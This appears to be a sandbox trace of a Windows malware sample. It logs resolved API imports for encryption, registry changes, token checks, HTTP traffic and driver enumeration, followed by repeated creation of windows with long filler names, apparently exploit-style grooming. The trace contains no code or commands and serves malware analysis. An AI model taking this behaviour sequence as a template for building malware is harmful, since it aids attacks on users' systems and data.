Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x7640aea1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x763f72c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x763f7446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x76401341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x763f9a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x763f78e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x763f88f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x76401361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x76400eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x763f7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x763fb17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x763f8332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7644fd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7640ae5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x763f90d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76400dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x763f8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x763f9679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x763f787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x76403559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76402320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x763ffc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7641e061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x763fb142 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x77820000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x77835689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x77834f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x778354f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x77835f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x7783ccee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x77836c3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x7783cbfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x77834eb8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7783d41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x778352d8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x77836001 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x77834de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x778358b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x7783b600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x7783522d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x760f40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x760f469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x760f14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x760f4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x760f0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x760f0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x760f431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x760e91ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x760edf14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x761077cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x760ee124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x760ec532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7610779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x760e8ee9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x760ec51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x760f46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x760f468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x760f40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x760f412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x760f157a True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x76940468 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76933c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76941e46 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x75a60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x75a9a8c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75a95d77 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x76570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7658ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x76594fae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x7659ba12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x7659492c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x76594a42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x76599197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7658b406 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75a20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x75a214cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x75a21514 True 1
Fn
Thread 0xaec
255 0
»
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
